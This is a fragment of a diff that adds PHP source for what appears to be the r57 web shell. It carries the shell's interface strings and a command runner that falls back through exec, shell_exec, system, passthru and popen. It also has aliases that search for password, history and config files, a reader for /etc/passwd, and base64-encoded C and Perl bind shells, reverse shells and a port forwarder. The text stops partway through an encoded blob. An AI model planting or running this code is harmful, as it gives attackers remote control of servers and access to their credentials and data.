+'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>' New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Table', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text77'=>'Show database structure', +'eng_text78'=>'show tables', +'eng_text79'=>'show columns', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "
:: "; +$table_up2 = " ::
"; +$table_up3 = ""; +$arrow = " ?"; +$lb = "["; +$rb = "]"; +$font = ""; +$ts = "
"; +$table_end1 = "
"; +$te = "
"; +$fs = "
"; +$fe = "
"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "
".$lang[$language.'_text96']."
"; } + else + { + echo '
'; + foreach($users as $user) { echo $user."
"; } + echo '
'; + } + echo "
[ BACK ]
"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= ""; + foreach($res as $file=>$v) + { + $r .= ""; + $r .= ""; + foreach($v as $a=>$b) + { + $r .= ""; + $r .= ""; + $r .= ""; + $r .= "\n"; + } + } + $r .= "
".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= ""; + $r .= "
".$a."".ws(2).$b."
"; + echo $r; + } + else + { + echo "

".$lang[$language.'_text56']."

"; + } + echo "
[ BACK ]
"; + die(); + } +if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat(" ",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "
".$text.$i."
"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "
".$text.$i."
"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; } +else { $text = "Can't create "; } +echo "
".$text.$i."
"; +return null; +} +function fe($l,$n) +{ +$text['ru'] = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????'); +$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'); +echo "
".$text[$l][$n]."
"; +return null; +} +function mr($l,$n) +{ +$text['ru'] = array('?? ??????? ????????? ??????','?????? ??????????'); +$text['eng'] = array('Can\'t send mail','Mail sent'); +echo "
".$text[$l][$n]."
"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = ""; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "".$t1."".$t2.""; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +function DirFiles($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (FALSE !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(!is_dir($dir."/".$file)) + { + if($types) + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,@explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirFilesWide($dir) + { + $files = Array(); + $dirs = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + $file = @strtoupper($file); + $dirs[$file] = '<DIR>'; + } + else + $files[$file] = @filesize($dir."/".$file); + } + } + @closedir($handle); + @ksort($dirs); + @ksort($files); + $files = @array_merge($dirs,$files); + } + return $files; + } + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirPrintHTMLHeaders($dir) + { + $pockets = ''; + $handle = @opendir($dir) or die("Can't open directory $dir"); + echo "
    \n"; + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + echo "
  • [ $file ]
    • \n"; + DirPrintHTMLHeaders($dir."/".$file); + } + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,array('.htm','.html'))) + { + $header = '-=None=-'; + $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); + for($a=0;$a".$header."\n"; + } + } + } + } + echo "
\n"; + @closedir($handle); + } + + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$aFilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"\\1",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp 